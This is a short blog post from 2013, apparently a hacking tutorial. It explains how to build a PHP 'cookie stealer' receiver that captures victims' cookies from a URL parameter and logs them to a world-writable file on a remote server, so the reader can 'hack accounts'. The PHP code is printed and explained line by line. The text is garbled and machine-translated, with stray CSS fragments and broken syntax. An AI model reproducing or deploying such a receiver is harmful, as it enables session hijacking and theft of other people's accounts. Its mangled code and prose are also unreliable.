Make Cookie Sealer PHP Script

Posted by Unknown on Monday, July 1, 2013

Make Cookie Sealer PHP Script Hi friends, lets you know exactly how that one cookie stealer work. There are two components in a cookie stealer:. the sender and the receiver What are cookies
? The sender can take many forms. In Essense, it's just a link the receiver with the cookie somehow attached. It can sometimes be difficult to find a way to implement Sender The receiver name suggests, is a device that receives the cookie from the sender. It can also take several forms, but the The most common is that of a PHP document, most commonly found residing on some obscure server Php Coding the receiver is a part. Only two things are necessary to make a receiver:. A As I said, the receiver's work is receive the cookie sender.Once the receiver has the cookie, it needs a way to get this cookie . Make Cookie Sealer PHP Script
      $ cookie = $ HTTP_GET_VARS ["cookie"]?  / / Line 2  $ file = fopen ('cookielog.txt', 'a') / / line 3  fwrite ($ file, $ cookie "\\ \\ n \\ \\ n".) / /  line 4 >  
Line 1 tells the server that it is a PHP paper Line 2 takes the cookie from the URL ("? stealer.php biscuit x = font-family: Arial, Tahoma," Century Gothic ", sans-serif; font-size") and stores it in the variable $ cookie Line 3 opens the file " cookielog.txt " for writing, then stores the handle $ file Line 4 writes cookie file which has its handle $ file. The period between $cookie and " \n\n " Combines the two strings into one. The " \n\n " acts as a double line break, which makes it easier for us to sift through the log file Line 5 is the same as above Done! Just download the files to ftp server and make permission text file " cookielog.txt " 777 Hack accounts by Flying Cookie accounts Hack For ARP poisoning ! Enjoy ...

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